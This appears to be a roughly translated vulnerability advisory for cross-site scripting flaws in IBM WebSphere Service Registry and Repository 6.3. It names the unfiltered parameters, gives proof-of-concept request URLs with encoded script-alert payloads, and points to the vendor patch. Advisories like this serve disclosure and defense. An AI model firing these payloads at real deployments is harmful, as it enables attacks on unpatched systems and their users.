Multiple Cross-Site Scripting Vulnerabilities and repairs in IBM WebSphere Service Registry and Repository

Affected Versions:

IBM WebSphere Service Registry and Repository 6.3

Vulnerability description:

Bugtraq id: 42281 WebSphere Service Registry and Repository are used for storage,

Systems that access and manage information (usually service metadata. When queryConditionGroupType is set to AND, WebSphere Service Registry and Repository

The searchTerm parameters submitted to ServiceRegistry/HelpSearch. do are not properly filtered and submitted

The queryItems [0]. value parameter of ServiceRegistry/QueryWizardProcessStep1.do is returned to the user,

This may cause cross-site scripting attacks.

<* Reference

IBM ( Ncsupp@ca.ibm.com)
Http://secunia.com/advisories/40862/

*>Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!

/ServiceRegistry/HelpSearch.do?searchTerm=%22%3E%3Cscript%3Ealert

%28%22XSS%22%29%3C/script%3E%3C/ServiceRegistry/QueryWizardProcessStep1.do?queryConditionGroupType=

AND&queryItems[0].value=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&queryItems

[1].value=&queryItems[2].value=&queryItems[3].value=&queryItems[4].value=&wizard.

button.setClassification=&wizard.button.next=Next

Security suggestions:

Manufacturer Patch: IBM --- the current manufacturer has released the upgrade patch to fix this security problem, please go to the manufacturer's home page download: http://www-01.ibm.com/support/docview.wss? Uid = swg1IZ76926